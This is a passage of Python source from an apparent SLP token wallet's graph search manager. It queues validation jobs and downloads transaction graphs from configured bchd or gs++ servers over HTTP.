        txid = valjob.root_txid
        with self.lock:
            if txid not in self._search_jobs:
                job = _GraphSearchJob(valjob)
                self._search_jobs[txid] = job
                self.search_queue.put(job)
            return self._search_jobs[txid]

    def toggle_graph_search(self, enable):
        """
        Used by the UI to enable/disable graph search.
        Since it's called only by the UI no locks are being held.
        """
        if self.gs_enabled == enable:
            return
        # get a weakref to each open wallet
        wallets = weakref.WeakSet()
        for job in self._search_jobs.copy().values():
            job.valjob.stop()
            if job.valjob.ref and job.valjob.ref():
                wallets.add(job.valjob.ref())
        # kill the current validator activity
        slp_validator_0x01.shared_context.kill()
        # delete all the gs jobs
        self._search_jobs.clear()
        self._set_gs_enabled(enable)
        # activate slp in each wallet
        for wallet in wallets:
            if wallet:
                wallet.activate_slp()

    def find(self, root_txid):
        """Return the job for root_txid, or None if no such job exists."""
        return self._search_jobs.get(root_txid, None)

    def jobs_copy(self):
        """Thread-safe shallow copy of the job table (for UI display)."""
        with self.lock:
            return self._search_jobs.copy()

    def restart_search(self, job):
        """Cancel a running job (if needed) and re-enqueue it."""
        def callback(job):
            self.get_gs_job(job.valjob)
        if not job.job_complete:
            job.sched_cancel(callback, reason='job restarted')
        else:
            callback(job)

    def mainloop(self):
        """Search-thread entry point: service jobs from the queue forever."""
        while True:
            job = self.search_queue.get(block=True)
            if not self.gs_enabled:
                job.set_failed('gs is disabled')
                continue
            job.search_started = True
            if not job.valjob.running and not job.valjob.has_never_run:
                job.set_failed('validation finished')
                continue
            try:
                # search_query is a network call, most time will be spent here
                self.search_query(job)
            except Exception as e:
                print("error in graph search query", e, file=sys.stderr)
                job.set_failed(str(e))
            finally:
                # always wake the validation job so it can observe the outcome
                job.valjob.wakeup.set()

    def search_query(self, job):
        """Perform the graph search HTTP request for one job and cache the
        downloaded transactions on the job. Raises on network/protocol errors;
        mainloop converts exceptions into a failed job."""
        if job.waiting_to_cancel:
            job._cancel()
            return
        if not job.valjob.running and not job.valjob.has_never_run:
            job.set_failed('validation finished')
            return
        print('GS Request: {} ({})'.format(job.root_txid, self.gs_host))
        # byte-reverse the txid hex string
        txid = codecs.encode(codecs.decode(job.root_txid, 'hex')[::-1], 'hex').decode()
        print('GS Request: {} (reversed) ({})'.format(txid, self.gs_host))
        # setup post url/query based on gs server kind
        kind = 'bchd'
        # FIX: use self.gs_host instead of the module-global slp_gs_mgr.gs_host;
        # equivalent for the singleton but correct for any instance and
        # consistent with the rest of the class.
        host = self.gs_host
        cache = []
        if networks.net.SLPDB_SERVERS.get(host):
            kind = networks.net.SLPDB_SERVERS.get(host)["kind"]
        if kind == 'gs++':
            url = host + "/v1/graphsearch/graphsearch"
            query_json = {"txid": txid}  # TODO: handle 'validity_cache' exclusion from graph search (NOTE: this will impact total dl count)
            res_txns_key = 'txdata'
        elif kind == 'bchd':
            # bchd wants the reversed txid bytes, base64 encoded
            root_hash_b64 = base64.standard_b64encode(codecs.decode(job.root_txid, 'hex')[::-1]).decode("ascii")
            url = host + "/v1/GetSlpGraphSearch"
            cache = job.get_job_cache(max_size=1000)
            tx_hashes = []
            for txid_hex in cache:
                raw_txid = codecs.decode(txid_hex, 'hex')
                tx_hashes.append(base64.standard_b64encode(raw_txid[::-1]).decode("ascii"))
            query_json = {"hash": root_hash_b64, "valid_hashes": tx_hashes}
            res_txns_key = 'txdata'
        else:
            raise Exception("unknown server kind")
        # stream the response; bytearray avoids quadratic bytes-concatenation
        buf = bytearray()
        headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}
        with requests.post(url, data=json.dumps(query_json), headers=headers, stream=True, timeout=60) as r:
            for chunk in r.iter_content(chunk_size=None):
                job.gs_response_size += len(chunk)
                self.bytes_downloaded += len(chunk)
                buf += chunk
                # bail out early if the validation job died or was canceled
                if not job.valjob.running:
                    job.set_failed('validation job stopped')
                    return
                # FIXME: for some reason weakref to wallet still exists after closing (o_O)
                elif job.waiting_to_cancel:
                    job._cancel()
                    return
                elif not self.gs_enabled:
                    return
        raw = bytes(buf)
        try:
            dat = json.loads(raw.decode('utf-8'))
            txns = dat[res_txns_key]
        except json.decoder.JSONDecodeError:
            msg = '=> %s' % raw.decode('utf-8')
            if len(raw.decode('utf-8')) > 100:
                msg = 'message is too long'
            raise Exception('server returned invalid json (%s)' % msg)
        except KeyError:
            # guard: the decoded json may not be a dict (e.g. a bare array)
            if isinstance(dat, dict) and dat.get('message', None):
                msg = dat['message']
                if 'txid is missing from slp validity set' in msg:
                    raise Exception('likely invalid slp')
            raise Exception(dat)
        for txn in txns:
            job.txn_count_progress += 1
            # server returns base64-encoded raw transactions
            tx = Transaction(base64.b64decode(txn).hex())
            job.put_tx(tx)
        job.set_success()
        print("[SLP Graph Search] job success.")
# Module-level singleton graph-search manager; starts its worker thread on import.
slp_gs_mgr = _SlpGraphSearchManager()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.